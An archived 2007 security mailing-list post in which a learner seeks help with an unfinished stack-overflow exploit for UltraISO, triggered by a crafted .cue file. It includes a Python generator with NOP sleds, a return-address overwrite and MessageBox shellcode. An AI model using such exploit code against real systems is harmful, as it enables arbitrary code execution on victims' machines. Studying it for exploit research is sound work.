Vuln Dev
Help developing exploit May 26 2007 05:32PM
KaCo678 aol com (2 replies)
Hi i was wondering if you would able to help.//I recently found a stack over flow in Ultra iso and was trying to write a local exploit for it..But im able to find the address where my nop sled is and every thing ive tried hasnt worked..And well as you seam to be a well respected member of the community you might be able to help me...Ive asked a few people for help with this one,,But still no further forward..Ill explain the best i can..Im able to control the ecx register and eip ..I attach aolly dbg and open the cue file..And the program crashes my eip points to 90909090 nop sled lol then i press shift + f9 and then i can write any thing i want to the eip so for testing i wrote 41424344 which then wrote to the eip and ecx register..At 3299 bytes then the 4 bytes to write to the registers..Ive provided a little test script..Its a mess but its just for testing m8..also worth noting that we still have to actually fill the rest of the file ..So altogether we have 5004 bytes to th
e file..I hope im making sence i was guna use bouncing shared library's method..But not sure i changed the eip to the address of 0x7C80C75B jmp ebp as my nops where in there some where...Ive wrote a python script im using to test it ...Also if you do take a look you will need to create a fake bin file in the same directory..Any help would be great thnx for your time.



import sys

import struct

import time

head_file = "\x46\x49\x4c\x45\x20\x22" #Header of file

buffer1 = "\x90" * 4000 #4000 nops

nop = "\x90" * 189 #189 nops

shell = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb" # 110 bytes shell code

shell += "\x77\x1d\x80\x7c"

shell += "\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"

shell += "\x28\xac\x80\x7c"

shell += "\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51"

shell += "\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff"

shell += "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"

shell += "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"

shell += "\xff\x4f\x6d\x65\x67\x61\x37\x4e"

fuck = "\x90" * 2 #lost 2 bytes some where made it up lol

offset = "\x41\x42\x43\x44"

buffer2 = "\x45" * 701 #fill the rest of the file with junk

Head_end = "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20" #end of file.

Head_end += "\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32"

Head_end += "\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31"

Head_end += "\x20\x30\x30\x3a\x30\x30\x3a\x30\x30"

cue_file = open("1.cue","wb")

cue_file.write(head_file + buffer1 + nop + shell + fuck + offset + buffer2 + Head_end)


Im very confused at the moment as a few people have told me a few ways to exploit this lol..But im still learning..I was wondering could i just not point my eip to my nop sled..So my shell code gets executed..Im working with windows xp sp2/..Just cant seam to get to the adress of my nop code/

[ reply ]
Re: Help developing exploit May 28 2007 02:34PM
Thomas Pollet (thomas pollet gmail com)
Re: Help developing exploit May 26 2007 10:40PM
Valdis Kletnieks vt edu


Privacy Statement
Copyright 2010, SecurityFocus